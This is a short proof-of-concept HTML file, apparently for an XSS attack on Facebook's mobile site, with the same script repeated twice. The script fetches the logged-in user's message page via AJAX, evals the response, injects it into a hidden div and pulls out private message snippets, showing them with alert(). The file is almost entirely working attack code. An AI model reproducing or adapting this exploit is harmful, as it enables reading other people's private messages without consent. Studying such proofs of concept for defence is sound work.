streghstreek/fb-xss-poc.html

## fb-xss-poc.html
<script type="text/javascript" src="http://www.online24.nl/static/assets/js/jquery-1.4.4.min.js"></script>
<script type="text/javascript">
    // http://iphone.facebook.com/photo_dashboard.php?endtime=1311780199&__ajax__&__metablock__=9
    $(function(){
        parse_messages = function()
        {
            $('.twoLines.preview>.snippet').each(function(index,value)
            {
                lines = value.innerHTML.replace(/(<([^>]+)>)/ig,'');

                alert(lines);
            });
        };

        $.ajax({
            url:"https://iphone.facebook.com/messages/?refid=7&__ajax__&__m_async_page__&__jewels__&__metablock__=3",
            success:function(data)
            {
                x = eval('('+data.substr(9)+')');
                document.write('<div style="display:none;">'+x.m[1].html+'</div>');

                parse_messages();
            }
        });
    });
</script>
	<script type="text/javascript" src="http://www.online24.nl/static/assets/js/jquery-1.4.4.min.js"></script>
	<script type="text/javascript">
	// http://iphone.facebook.com/photo_dashboard.php?endtime=1311780199&__ajax__&__metablock__=9
	$(function(){
	parse_messages = function()
	{
	$('.twoLines.preview>.snippet').each(function(index,value)
	{
	lines = value.innerHTML.replace(/(<([^>]+)>)/ig,'');

	alert(lines);
	});
	};

	$.ajax({
	url:"https://iphone.facebook.com/messages/?refid=7&__ajax__&__m_async_page__&__jewels__&__metablock__=3",
	success:function(data)
	{
	x = eval('('+data.substr(9)+')');
	document.write('<div style="display:none;">'+x.m[1].html+'</div>');

	parse_messages();
	}
	});
	});
	</script>